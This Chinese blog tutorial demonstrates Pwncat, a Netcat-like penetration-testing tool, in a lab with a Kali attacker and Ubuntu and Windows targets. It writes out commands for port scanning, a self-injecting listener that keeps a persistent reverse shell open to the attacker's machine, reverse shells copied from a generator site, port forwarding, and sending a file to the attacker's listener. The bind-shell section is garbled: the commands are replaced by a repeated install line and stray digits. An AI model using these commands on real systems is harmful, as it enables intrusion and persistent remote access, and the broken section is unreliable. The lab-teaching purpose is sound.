part1
点击上方蓝字关注我们
往期推荐
将二进制空间安全设为"星标⭐️"
第一时间收到文章更新
摘要
Pwncat是一款功能丰富类似Netcat的工具,专为渗透测试人员和红队人员设计, 该工具的亮点主要表现在具有语法突出显示和命令完成功能的交互式Shell; 具备二次开发的接口, 可扩展性强; 该工具支持加密通信通道, 确保交互时的机密性, 相比较Netcat, Pwncat更能适应在复杂网络环境下的渗透场景。
本篇文章将实验 Pwncat在Linux和Windows目标机器之间的用法。
Pwncat的官网地址:https://pwncat.org/
实验环境准备
目标机器:Ubuntu (192.168.1.23)、Windows (192.168.1.4)
攻击机器: Kali Linux (192.168.1.7)
在Kali系统中, 可以使用apt或pip命令安装pwncat。
apt安装命令如下:
apt install pwncat
pip安装命令如下:
pip install pwncat
端口扫描和Banner抓取
Pwncat 可用于通过指定端口范围和–banner标志来对开放端口执行端口扫描和banner抓取。
pwncat -z 192.168.1.23 1-100
pwncat -z 192.168.1.23 1-100 --banner
Pwncat 不仅可以在 TCP 端口上执行端口扫描,还可以通过在上述命令中使用-u标志来扫描 UDP 端口。
设为侦听器
当用作侦听器时,pwncat 通过在 /tmp/ 目录中创建文件来保持持久性。因此,如果连接丢失,仍然可以在之前使用的相同端口(如持久性)获得反向 shell。
pwncat -l 1234 --self-inject /bin/bash:192.168.1.7:1234
终止上述连接后,可以通过在同一端口运行 rlwrap 侦听器来检查持久性, 如图:
Pwncat 具有在多个端口上创建持久性连接的功能,以下命令可以实现这一操作:
pwncat -l 1234 --self-inject /bin/bash:192.168.1.7:1234+2
可以观察到,除了1234端口之外,还可以在1235和1236端口上获得反向shell:
反向Shell(Windows)
要获取反向 shell,可以从 Windows 计算机中的反向 shell 生成器 ( https://www.revshells.com/ ) 使用命令来获取反向 shell。
在执行从 revshells.com 复制的命令之前,使用以下命令在 kali 机器的端口 4444 处启动监听器:
pwncat -l 4444
本地端口转发
使用以下命令在 Ubuntu 计算机中安装 pwncat:
pip3 install pwncat
在上面的反向shell步骤中获取到反向shell之后, 观察到在Ubuntu机器的8080端口上有一个应用程序正在运行。因此,为了在Kali机器上访问该Web应用程序,接下来将使用以下命令执行本地端口转发:
pwncat -L 0.0.0.0:5000 127.0.0.1 8080
执行上述命令后,现在可以在 kali 机器内访问 Web 应用程序,网址为:http://192.168.1.23:5000, 如图:
发送和接收文件
除了上面讨论的用法之外,pwncat 还可以用于发送/接收文件, 在 Ubuntu 系统中创建一个文件作为 ubuntu 计算机中的data.txt文件,并在要接收该文件的 kali 计算机中启动侦听器。
要在kali机器中接收文件,可以使用以下命令:
pwncat -l 6666 > data.txt
监听器激活后,可以使用以下命令在 kali 机器中传输文件。
pwncat 192.168.1.7 6666 < data.txt
绑定Shell(Linux)
要获取绑定 shell,使用以下命令在 kali 机器内启动侦听器:
pip install pwncat
0
在 Ubuntu 机器中输入以下命令:
pip install pwncat
1
可以观察到在kali机器上获得了bind shell连接。由于上面使用了-k标志,一旦客户端断开连接,绑定 shell 就会重新接受新客户端。
可以注意到,在使用 UDP 端口时,只需在命令后使用-u标志即可满足上述过程。
往期推荐
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...